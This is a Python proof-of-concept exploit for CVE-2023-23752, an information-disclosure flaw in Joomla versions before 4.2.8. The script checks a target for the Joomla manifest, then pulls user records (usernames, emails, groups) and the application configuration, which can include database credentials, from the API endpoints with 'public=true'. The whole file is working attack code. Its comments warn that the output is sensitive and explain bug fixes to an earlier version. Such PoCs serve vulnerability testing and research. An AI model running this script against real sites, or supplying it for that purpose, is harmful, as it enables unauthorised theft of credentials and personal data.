PoCs/CVE-2023-23752/CVE-2023-23752.py


import requests
import json
import argparse
class User:
    """One account record taken from the users API response.

    Holds the four fields this script reports: username, email address,
    last-visit timestamp and group names.
    """

    def __init__(self, name, email, lastvisitDate, groupNames):
        # Values are stored exactly as received; nothing is validated or
        # normalised here.
        self.name, self.email = name, email
        self.lastvisitDate, self.groupNames = lastvisitDate, groupNames

    def __str__(self):
        """Render the record as four labelled lines for console output."""
        return (
            f"Username: {self.name}\n"
            f"Email: {self.email}\n"
            f"Last Visit: {self.lastvisitDate}\n"
            f"Groups: {self.groupNames}"
        )
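def vulnCheck(tgt):
    """Confirm that the target serves the Joomla core manifest, else exit.

    Requests ``<tgt>/administrator/manifests/files/joomla.xml``. If the
    request fails, the server answers with a non-success status, or the body
    is empty or mentions "404"/"403", a message is printed and ``SystemExit``
    is raised. Returns ``None`` when the manifest is reachable.

    NOTE: this is a reachability test only. The version inside the manifest
    is not parsed or compared with 4.2.8 (the release named in this tool's
    description), so passing it does not establish that the site is affected.
    """
    verUrl = tgt + "/administrator/manifests/files/joomla.xml"
    try:
        # Bounded wait so an unresponsive host cannot hang the run.
        verData = requests.get(verUrl, timeout=10)
    except requests.RequestException as err:
        print(f"[-] Request to {verUrl} failed: {err}")
        raise SystemExit from err

    body = verData.text.lower()
    # The HTTP status is the authoritative signal; the body-text test is kept
    # for servers that return an error page with a 200 status.
    if not verData.ok or not body or "404" in body or "403" in body:
        print("[-] Site does not appear to be vulnerable!")
        raise SystemExit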
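def getUsers(tgt):
    """Fetch the users listing from the target's web-services API.

    Requests ``<tgt>/api/index.php/v1/users?public=true`` and returns the
    decoded JSON document. On a transport error, a non-success HTTP status,
    or a body that is not JSON, a message is printed and ``SystemExit`` is
    raised.
    """
    usrUrl = tgt + "/api/index.php/v1/users?public=true"
    try:
        # Bounded wait so an unresponsive host cannot hang the run.
        usrData = requests.get(usrUrl, timeout=10)
    except requests.RequestException as err:
        print(f"[-] Error fetching user data: {err}")
        raise SystemExit from err

    # Decide on the status code, not on the body text: a valid listing can
    # legitimately contain "404" or "403" (an id, a date, an address), which
    # a substring test would misread as an error page.
    if not usrData.ok:
        print("[-] Error fetching user data, site may not be vulnerable")
        raise SystemExit

    try:
        parsedUsrs = json.loads(usrData.text)
    except ValueError as err:
        # A 200 response that is not JSON is an HTML page, not the API.
        print("[-] Error fetching user data, response was not JSON")
        raise SystemExit from err
    return parsedUsrs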
def parseUsers(usrData):
    """Convert the decoded users response into a list of ``User`` objects.

    Reads ``usrData["data"]`` and, for every entry, the ``username``,
    ``email``, ``lastvisitDate`` and ``group_names`` keys of its
    ``attributes`` mapping. A missing key raises ``KeyError``.
    """

    def _to_user(entry):
        # Each entry keeps the reported fields under "attributes".
        attrs = entry["attributes"]
        return User(
            attrs["username"],
            attrs["email"],
            attrs["lastvisitDate"],
            attrs["group_names"],
        )

    return [_to_user(entry) for entry in usrData["data"]]
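def getConfig(tgt):
    """Fetch the application configuration from the web-services API.

    Requests ``<tgt>/api/index.php/v1/config/application?public=true`` and
    returns the decoded JSON document. On a transport error, a non-success
    HTTP status, or a body that is not JSON, a message is printed and
    ``SystemExit`` is raised.

    NOTE: on an affected site the returned attributes can include database
    credentials and other secrets, so treat the result as sensitive: keep it
    out of shared logs and tickets, and rotate anything that was exposed.
    """
    cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
    try:
        # Bounded wait so an unresponsive host cannot hang the run.
        cfgData = requests.get(cfgUrl, timeout=10)
    except requests.RequestException as err:
        print(f"[-] Error fetching config data: {err}")
        raise SystemExit from err

    # Decide on the status code, not on the body text: configuration values
    # can legitimately contain "404" or "403".
    if not cfgData.ok:
        # The original message said "user data" here (copy-paste slip).
        print("[-] Error fetching config data, site may not be vulnerable")
        raise SystemExit

    try:
        parsedCfg = json.loads(cfgData.text)
    except ValueError as err:
        # A 200 response that is not JSON is an HTML page, not the API.
        print("[-] Error fetching config data, response was not JSON")
        raise SystemExit from err
    return parsedCfg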
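if __name__ == "__main__":
    # Command-line entry point: check one target and print what its API
    # returns for the users and application-config endpoints.
    parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
    args = parser.parse_args()

    # Keep the target as typed (URL paths are case-sensitive) and compare only
    # the scheme case-insensitively. The original test, tgt[4] != "http",
    # compared a single character with a whole word, so it was always true
    # (and raised IndexError on short input): "http://" was prepended even
    # to full URLs.
    tgt = args.target.strip().rstrip("/")
    if not tgt.lower().startswith(("http://", "https://")):
        # Plain HTTP means anything the site returns crosses the network
        # unencrypted; pass an https:// URL where the site supports it.
        print("[*] No URL schema specified, defaulting to HTTP")
        tgt = "http://" + tgt

    vulnCheck(tgt)

    # Fetch before announcing, so the "found" banner is never printed for a
    # request that then fails.
    users = parseUsers(getUsers(tgt))
    print("\n[+] User data found!")
    print("----------")
    for user in users:
        print(user)
        print("----------")

    # NOTE: on an affected site these attributes can include database
    # credentials; treat this output as secret material.
    cfgEntries = getConfig(tgt)["data"]
    print("\n[+] Config data found!")
    print("----------")
    for entry in cfgEntries:
        print(entry["attributes"])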